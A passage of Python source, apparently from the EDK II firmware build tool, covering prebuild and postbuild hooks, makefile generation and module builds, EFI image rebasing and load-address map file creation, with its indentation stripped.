# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = [l.split("=", 1) for l in envs ]
envs = [[I.strip() for I in item] for item in envs if len(item) == 2]
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.name = "STDOUT-Redirector"
StdOutThread.daemon = False
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.name = "STDERR-Redirector"
StdErrThread.daemon = False
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand=None, PcdMaList=None):
if AutoGenObject is None:
return False
if FfsCommand is None:
FfsCommand = {}
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
mqueue = mp.Queue()
for m in AutoGenObject.GetAllModuleInfo:
mqueue.put(m)
mqueue.put((None,None,None,None,None,None,None))
AutoGenObject.DataPipe.DataContainer = {"CommandTarget": self.Target}
AutoGenObject.DataPipe.DataContainer = {"Workspace_timestamp": AutoGenObject.Workspace._SrcTimeStamp}
AutoGenObject.CreateLibModuelDirs()
AutoGenObject.DataPipe.DataContainer = {"LibraryBuildDirectoryList":AutoGenObject.LibraryBuildDirectoryList}
AutoGenObject.DataPipe.DataContainer = {"ModuleBuildDirectoryList":AutoGenObject.ModuleBuildDirectoryList}
AutoGenObject.DataPipe.DataContainer = {"FdsCommandDict": AutoGenObject.Workspace.GenFdsCommandDict}
self.Progress.Start("Generating makefile and code")
data_pipe_file = os.path.join(AutoGenObject.BuildDir, "GlobalVar_%s_%s.bin" % (str(AutoGenObject.Guid),AutoGenObject.Arch))
AutoGenObject.DataPipe.dump(data_pipe_file)
cqueue = mp.Queue()
autogen_rt,errorcode = self.StartAutoGen(mqueue, AutoGenObject.DataPipe, self.SkipAutoGen, PcdMaList, cqueue)
AutoGenIdFile = os.path.join(GlobalData.gConfDirectory,".AutoGenIdFile.txt")
with open(AutoGenIdFile,"w") as fw:
fw.write("Arch=%s\n" % "|".join((AutoGenObject.Workspace.ArchList)))
fw.write("BuildDir=%s\n" % AutoGenObject.Workspace.BuildDir)
fw.write("PlatformGuid=%s\n" % str(AutoGenObject.Guid))
self.Progress.Stop("done!")
if not autogen_rt:
self.AutoGenMgr.TerminateWorkers()
self.AutoGenMgr.join(1)
raise FatalError(errorcode)
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(True)
AutoGenObject.CreateMakeFile(True)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# run
if Target == 'run':
return True
# Fetch the MakeFileName.
self.MakeFileName = AutoGenObject.MakeFileName
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# build library
if Target == 'libraries':
DirList = []
for Lib in AutoGenObject.LibraryAutoGenList:
if not Lib.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
for Lib, LibAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
return True
# build module
if Target == 'modules':
DirList = []
for Lib in AutoGenObject.LibraryAutoGenList:
if not Lib.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, Lib.BuildDir),Lib))
for Lib, LibAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,LibAutoGen)
DirList = []
for ModuleAutoGen in AutoGenObject.ModuleAutoGenList:
if not ModuleAutoGen.IsBinaryModule:
DirList.append((os.path.join(AutoGenObject.BuildDir, ModuleAutoGen.BuildDir),ModuleAutoGen))
for Mod,ModAutoGen in DirList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, self.MakeFileName)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir,ModAutoGen)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, self.MakeFileName))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, self.MakeFileName))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(True)
AutoGenObject.CreateMakeFile(True)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
if GlobalData.gBinCacheDest:
self.GenDestCache()
elif GlobalData.gUseHashCache and not GlobalData.gBinCacheSource:
# Only for --hash
# Update PreMakeCacheChain files
self.GenLocalPreMakeCache()
self.BuildModules = []
return True
# genfds
if Target == 'fds':
if GenFdsApi(AutoGenObject.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
Threshold = self.GetFreeSizeThreshold()
if Threshold:
self.CheckFreeSizeThreshold(Threshold, AutoGenObject.FvDir)
return True
# run
if Target == 'run':
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect function address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.append('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.append('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.append('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.append('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.append('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.append('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add function address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.append(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.append(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile(r"\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.append(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.append('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize // 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize // 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.append('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize // 0x1000))
MapBuffer.append('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize // 0x1000))
MapBuffer.append('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize // 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.append('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize // 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.append('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, ''.join(MapBuffer), False)
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
for Arch in Wa.ArchList:
PcdMaList = []
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
PcdMaList.append(Ma)
self.BuildModules.append(Ma)
Pa.DataPipe.DataContainer = {"FfsCommand":CmdListDict}
Pa.DataPipe.DataContainer = {"Workspace_timestamp": Wa._SrcTimeStamp}
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict,PcdMaList=PcdMaList)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = []
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
self.CreateGuidedSectionToolsFile(Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd(Wa.ArchList)
GlobalData.file_lock = mp.Lock()
GlobalData.FfsCmd = CmdListDict
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
if self.ModuleFile.Dir == Module.Dir and self.ModuleFile.Name == Module.Name:
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile,Pa.DataPipe)
if Ma is None:
continue
if Ma.PcdIsDriver:
Ma.PlatformInfo = Pa
Ma.Workspace = Wa
MaList.append(Ma)
if GlobalData.gUseHashCache and not GlobalData.gBinCacheDest and self.Target in [None, "", "all"]:
if Ma.CanSkipbyPreMakeCache():
continue
else:
self.PreMakeCacheMiss.add(Ma)
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
self.Progress.Start("Generating code")
Ma.CreateCodeFile(True)
self.Progress.Stop("done!")
if self.Target == "genc":
return True
if not self.SkipAutoGen or self.Target == 'genmake':
self.Progress.Start("Generating makefile")
if CmdListDict and self.Fdf and (Module.Path, Arch) in CmdListDict:
